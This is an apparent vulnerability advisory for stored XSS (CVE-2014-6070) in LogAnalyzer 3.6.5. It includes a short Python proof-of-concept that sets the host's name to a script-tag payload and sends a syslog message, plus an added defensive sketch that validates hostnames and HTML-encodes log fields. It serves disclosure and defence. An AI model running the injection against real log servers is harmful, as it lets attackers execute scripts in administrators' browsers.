LogAnalyzer 3.6.5 Cross Site Scripting

2014.09.03
Credit: Dolev Farhi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Author: Dolev Farhi @dolevff
Application: LogAnalyzer
Date: 8.2.2014
Tested on: Red Hat Enterprise Linux 6.4
Relevant CVEs: CVE-2014-6070

1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events, as well as reporting services.

2. Vulnerability description
-----------------------------
It was found that an XSS injection is possible on a syslog server running LogAnalyzer version 3.6.5. By changing the hostname of any entity logging to the syslog server with LogAnalyzer to <script>alert("xss")</script> and sending an arbitrary syslog message, client-side script execution is possible.

3. Life cycle
--------------------
8.2.2014 - Vulnerability identified
9.2.2014 - CVE requested
9.2.2014 - CVE assigned
9.2.2014 - Vendor releases a fix in minor release version 3.6.6

4. Proof of concept
-----------------------
A proof of concept video and a working exploit can be found here:
http://research.openflare.org/poc/OF-2014-16/

#!/usr/bin/python
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection
# Date: Sept 2014
# Exploit Author: Dolev Farhi dolevf at yahoo dot com
# Vendor homepage: loganalyzer.adiscon.com
# Version: Stable 3.6.5
# Tested on Red Hat Enterprise Linux 6.4
# CVE: CVE-2014-6070
# Python 2 script (uses raw_input)

import os
import syslog

# Remember the current hostname so it can be restored afterwards
hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""
print("+ Setting temporary hostname to " + payload + "...")
os.system("hostname " + payload)
print("+ Injecting the syslog message...")
syslog.syslog("syslog xss injection")
print("+ Check LogAnalyzer dashboard...")
raw_input("+ Press [enter] to restore hostname...")
os.system("hostname " + "\"" + hostname + "\"")
print("+ Hostname restored to " + hostname)

5. Recommendation
--------------------------
Upgrade to LogAnalyzer 3.6.6.
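
The following Python 3 sketch is an added example, not part of the original advisory and not the vendor's 3.6.6 patch. It shows the two defensive checks the issue calls for in any log viewer: flag records whose hostname field is not a syntactically valid hostname or IP address, and HTML-encode every log-derived field before it is rendered. The traditional syslog file line layout, the function names and the sample lines are assumptions made for illustration.

```python
import html
import ipaddress
import re

# Assumed layout (traditional syslog file line): "Mmm dd hh:mm:ss HOST TAG: MSG"
LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d{2}:\d{2}:\d{2}) "
                     r"(?P<host>\S+) (?P<tag>[^:]+): (?P<msg>.*)$")
# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(r"^(?=.{1,253}$)" + LABEL + r"(?:\." + LABEL + r")*$")

def is_valid_host(host):
    """True for an RFC 1123 hostname or an IP address literal."""
    if HOST_RE.match(host):
        return True
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def render_row(rec):
    """Build one HTML table row, encoding every log-derived field."""
    cells = (rec["ts"], rec["host"], rec["tag"], rec["msg"])
    return "<tr>" + "".join("<td>%s</td>" % html.escape(c, quote=True)
                            for c in cells) + "</tr>"

def triage(lines):
    rows, alerts = [], []  # rendered HTML rows, (reason, value) findings
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            alerts.append(("unparsed", line))
            continue
        rec = m.groupdict()
        if not is_valid_host(rec["host"]):
            alerts.append(("bad-hostname", rec["host"]))
        rows.append(render_row(rec))  # still shown, but inert after encoding
    return rows, alerts

# Constructed sample lines; the second carries the hostname from the advisory
SAMPLE = [
    "Sep  3 10:15:01 web01 sshd[2211]: Accepted publickey for deploy",
    "Sep  3 10:15:07 <script>alert('XSS');</script> python: syslog xss injection",
    "Sep  3 10:15:09 db-02.example.com cron[88]: job <b>done</b> & logged",
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The hostname check is a detection signal only; the output encoding in render_row is what keeps a hostile field from executing in the browser.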

